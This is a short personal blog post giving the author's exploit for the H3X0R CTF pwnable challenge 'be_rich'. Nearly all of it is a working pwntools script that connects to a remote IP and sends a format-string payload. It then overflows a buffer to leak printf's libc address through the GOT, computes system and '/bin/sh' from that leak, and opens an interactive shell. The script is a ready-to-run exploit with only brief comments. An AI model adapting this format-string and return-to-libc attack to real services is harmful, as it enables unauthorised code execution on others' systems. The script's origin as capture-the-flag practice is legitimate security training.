cdor1's lab
H3X0R CTF be_rich
Afterword: I forgot to upload the exploit code I wrote a while ago.
That wraps up the H3X0R CTF pwnable challenges.
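```python
from pwn import *

s = remote('52.199.49.117', 10002)
elf = ELF('/home/cdor1/pwn100')

# Stage 0: format string in the name field. %100000d prints 100000
# characters, then %7$n stores that count through the pointer found in
# the 7th argument slot.
print(s.recvuntil(b'Give me your name!'))
s.sendline(b'%100000d%7$n')

# Stage 1: overflow the comment buffer and return into printf@plt with
# printf's GOT entry as its argument, which leaks printf's libc address.
print(s.recvuntil(b'Comment :'))
pay = b'A' * 32
pay += p32(elf.plt['printf'])
pay += p32(0x80488df)          # return address after printf; the prompts are shown again
pay += p32(elf.got['printf'])
s.sendline(pay)
print(s.recv(2048))
leak = u32(s.recv(4))

# Offsets from the leaked printf address (specific to the target's libc).
binsh = leak + 0x1140c4
system = leak - 0xd0f0

# Stage 2: same overflow, this time returning into system("/bin/sh").
pay2 = b'A' * 33
pay2 += p32(system)
pay2 += b'AAAA'                # dummy return address for system
pay2 += p32(binsh)

# The original mixed the names `io` and `s`; only `s` is defined.
s.recvuntil(b'Give me your name!')
s.sendline(b'%100000d%7$n')
s.recvuntil(b'Comment : ')
s.sendline(pay2)
s.interactive()
```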